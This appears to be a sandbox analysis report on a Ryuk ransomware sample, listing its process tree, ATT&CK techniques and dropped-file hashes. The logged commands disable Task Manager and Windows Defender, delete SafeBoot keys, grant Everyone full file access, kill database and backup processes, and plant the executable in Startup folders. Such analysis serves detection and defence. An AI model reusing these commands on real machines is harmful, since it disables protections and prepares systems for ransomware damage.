attrib +h +s ryuk.exe
3⤵
- Views/modifies file attributes
PID:1716

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:2416

C:\Windows\system32\attrib.exe
attrib +h +s C:\ProgramData\ryuk.exe
3⤵
- Views/modifies file attributes
PID:1540

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
2⤵
- Suspicious use of WriteProcessMemory
PID:1080

C:\Windows\system32\cmd.exe
cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
3⤵
- Suspicious use of WriteProcessMemory
PID:2644

C:\Windows\system32\icacls.exe
icacls * /grant Everyone:(OI)(CI)F /T /C /Q
4⤵
- Modifies file permissions
PID:2828

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit
2⤵
- Suspicious use of WriteProcessMemory
PID:1992

C:\Windows\system32\cmd.exe
cmd.exe /c taskkill /t /f /im sql*
3⤵
PID:2508

C:\Windows\system32\taskkill.exe
taskkill /t /f /im sql*
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2908

C:\Windows\system32\taskkill.exe
taskkill /f /t /im veeam*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2900

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
2⤵
PID:2844

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
3⤵
PID:844

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog1
2⤵
PID:3052

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog2
2⤵
PID:2156

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID
2⤵
PID:2856

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog1
2⤵
PID:2712

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "
2⤵
PID:2772

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
2⤵
PID:2480

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
3⤵
PID:372

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
2⤵
PID:1924

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
3⤵
PID:1608

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
2⤵
PID:2808

C:\Windows\system32\reg.exe
reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
3⤵
PID:3008

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
2⤵
PID:584

C:\Windows\system32\reg.exe
reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
3⤵
PID:2944

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Hidden Files and Directories

T1158

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File Permissions Modification

T1222

Hidden Files and Directories

T1158

Credential Access

Discovery

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\RyukReadMe.html
Filesize
144B

MD5
2d581d7f41be876ce36523d0a7f2a64a

SHA1
279f1b7f8936ab44e75bec3695d68569d8bbca9e

SHA256
53c9308d8e9a7949f9348038493d87aa1218a148f404a7c340f7d47525ea90dd

SHA512
4caf790b2d8feb5b2e9bab0ede191cff81a1547221408255e17e5e549a1fcd3615ea502d6d55b843c50a0eeac0bad13a2261d03f8b580ce6a592298340071c53

Download Submit
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\RyukReadMe.txt
Filesize
1KB

MD5
82ea3d2f6fc005352ce69909570def3d

SHA1
a43c1be5adc6a957d8a4ed727c3d1d5c648b6397

SHA256
56edcf4ec31883a101939b9fb4149d4944f00be0663a4a339afbc0910ea085bc

SHA512
197d2e2e5208de3c338ecc383b0fe016c8b5148d476640b6d1a7054f9417e698070edf38376359a26d43a7c6240d0362744f8fd416d46f723d492f230af1a440

Download Submit
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe
Filesize
889KB

MD5
ecd9d8ef99eb9813fa4eced549ea4d88

SHA1
7db7bff4ca9e94bbfe026c2282f3ce36e423f183

SHA256
fe4547b20cf40de0e33ed545949f3e0dfef815b5add252d233177386910643a6

SHA512
2882d1b8ca5654b142e368f2bcb712bf9d8e3e096aacaf5a5f6ffb62b3062df0245db05e13bdc61ab2bd676349c751b87e8880ab034e73d6cd94e29cc165648b

Download Submit
C:\ProgramData\RYUKID
Filesize
8B

MD5
609261b3d4e430ff93b8c8cdca7be429

SHA1
cd2be2be6cab95914147dd192c288b5e43f95d2b

SHA256
b5140db3c4d5379b0fbb53d8952b3235297f0c786d4c5a282d8c2b06939252d3

SHA512
4d6d383b4ba112f9be8add0b051769852dd219a35f0ec45c407fd8ec54644b1d13f3af4e4d88d4f65c2c88c20916fdff6318b583e9cfb8def1f2d9022334fb2f

Download Submit
C:\ProgramData\RyukReadMe.txt
Filesize
1KB

MD5
82ea3d2f6fc005352ce69909570def3d

SHA1
a43c1be5adc6a957d8a4ed727c3d1d5c648b6397

SHA256
56edcf4ec31883a101939b9fb4149d4944f00be0663a4a339afbc0910ea085bc

SHA512
197d2e2e5208de3c338ecc383b0fe016c8b5148d476640b6d1a7054f9417e698070edf38376359a26d43a7c6240d0362744f8fd416d46f723d492f230af1a440

Download Submit
C:\ProgramData\hrmlog1
Filesize
8KB

MD5
87266b0a2f17c202002a02cdf7a14feb

SHA1
c26e1d9d95c6c77383925af484e5fa1bff6b42bb

SHA256
a5bb0c2b1712094e6e2572edd0ff859546b6c75b9cf6d4aa87bcca9e5ece110c

SHA512
651db30b17b5521a98f88a53a49ebc5527dba0de4d3daadc4fbcc97a536385a18db68dcf190de14579ce3b1e12983e19efb7c5b9c460a5f4fa2b58f83c0ece68

Download Submit
C:\ProgramData\hrmlog1
Filesize
8KB

MD5
87266b0a2f17c202002a02cdf7a14feb

SHA1
c26e1d9d95c6c77383925af484e5fa1bff6b42bb

SHA256
a5bb0c2b1712094e6e2572edd0ff859546b6c75b9cf6d4aa87bcca9e5ece110c

SHA512
651db30b17b5521a98f88a53a49ebc5527dba0de4d3daadc4fbcc97a536385a18db68dcf190de14579ce3b1e12983e19efb7c5b9c460a5f4fa2b58f83c0ece68

Download Submit
C:\ProgramData\hrmlog1
Filesize
8KB

MD5
87266b0a2f17c202002a02cdf7a14feb

SHA1
c26e1d9d95c6c77383925af484e5fa1bff6b42bb

SHA256
a5bb0c2b1712094e6e2572edd0ff859546b6c75b9cf6d4aa87bcca9e5ece110c

SHA512
651db30b17b5521a98f88a53a49ebc5527dba0de4d3daadc4fbcc97a536385a18db68dcf190de14579ce3b1e12983e19efb7c5b9c460a5f4fa2b58f83c0ece68

Download Submit
C:\ProgramData\hrmlog2
Filesize
292B

MD5
4fd17a6fe54d7ef1d007d3bab3ff5fce

SHA1
4b76934d7e6214db44d83777899bd69db3294435

SHA256
402441604ef88d76bbfa022d945514b7b6218997238175ca6c9925d0ad000e6b

SHA512
bece45130c568e1d392b08bde6b1dc44b443b6da26f74df4d4ec38f0a53f7b0315eaf1638e1599d947179895e04a1ee0e182b168e33add26492c8175364f20b3

Download Submit
C:\ProgramData\hrmlog2
Filesize
292B

MD5
4fd17a6fe54d7ef1d007d3bab3ff5fce

SHA1
4b76934d7e6214db44d83777899bd69db3294435

SHA256
402441604ef88d76bbfa022d945514b7b6218997238175ca6c9925d0ad000e6b

SHA512
bece45130c568e1d392b08bde6b1dc44b443b6da26f74df4d4ec38f0a53f7b0315eaf1638e1599d947179895e04a1ee0e182b168e33add26492c8175364f20b3

Download Submit
C:\ProgramData\ryuk.exe
Filesize
889KB

MD5
ecd9d8ef99eb9813fa4eced549ea4d88

SHA1
7db7bff4ca9e94bbfe026c2282f3ce36e423f183

SHA256
fe4547b20cf40de0e33ed545949f3e0dfef815b5add252d233177386910643a6

SHA512
2882d1b8ca5654b142e368f2bcb712bf9d8e3e096aacaf5a5f6ffb62b3062df0245db05e13bdc61ab2bd676349c751b87e8880ab034e73d6cd94e29cc165648b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RYUKID
Filesize
8B

MD5
609261b3d4e430ff93b8c8cdca7be429

SHA1
cd2be2be6cab95914147dd192c288b5e43f95d2b

SHA256
b5140db3c4d5379b0fbb53d8952b3235297f0c786d4c5a282d8c2b06939252d3

SHA512
4d6d383b4ba112f9be8add0b051769852dd219a35f0ec45c407fd8ec54644b1d13f3af4e4d88d4f65c2c88c20916fdff6318b583e9cfb8def1f2d9022334fb2f

Download Submit
C:\Users\Admin\AppData\Local\Temp\hrmlog1
Filesize
8KB

MD5
87266b0a2f17c202002a02cdf7a14feb

SHA1
c26e1d9d95c6c77383925af484e5fa1bff6b42bb

SHA256
a5bb0c2b1712094e6e2572edd0ff859546b6c75b9cf6d4aa87bcca9e5ece110c

SHA512
651db30b17b5521a98f88a53a49ebc5527dba0de4d3daadc4fbcc97a536385a18db68dcf190de14579ce3b1e12983e19efb7c5b9c460a5f4fa2b58f83c0ece68

Download Submit
C:\Users\Admin\AppData\Local\Temp\hrmlog2
Filesize
292B

MD5
4fd17a6fe54d7ef1d007d3bab3ff5fce

SHA1
4b76934d7e6214db44d83777899bd69db3294435

SHA256
402441604ef88d76bbfa022d945514b7b6218997238175ca6c9925d0ad000e6b

SHA512
bece45130c568e1d392b08bde6b1dc44b443b6da26f74df4d4ec38f0a53f7b0315eaf1638e1599d947179895e04a1ee0e182b168e33add26492c8175364f20b3

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe
Filesize
889KB

MD5
ecd9d8ef99eb9813fa4eced549ea4d88

SHA1
7db7bff4ca9e94bbfe026c2282f3ce36e423f183

SHA256
fe4547b20cf40de0e33ed545949f3e0dfef815b5add252d233177386910643a6

SHA512
2882d1b8ca5654b142e368f2bcb712bf9d8e3e096aacaf5a5f6ffb62b3062df0245db05e13bdc61ab2bd676349c751b87e8880ab034e73d6cd94e29cc165648b

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads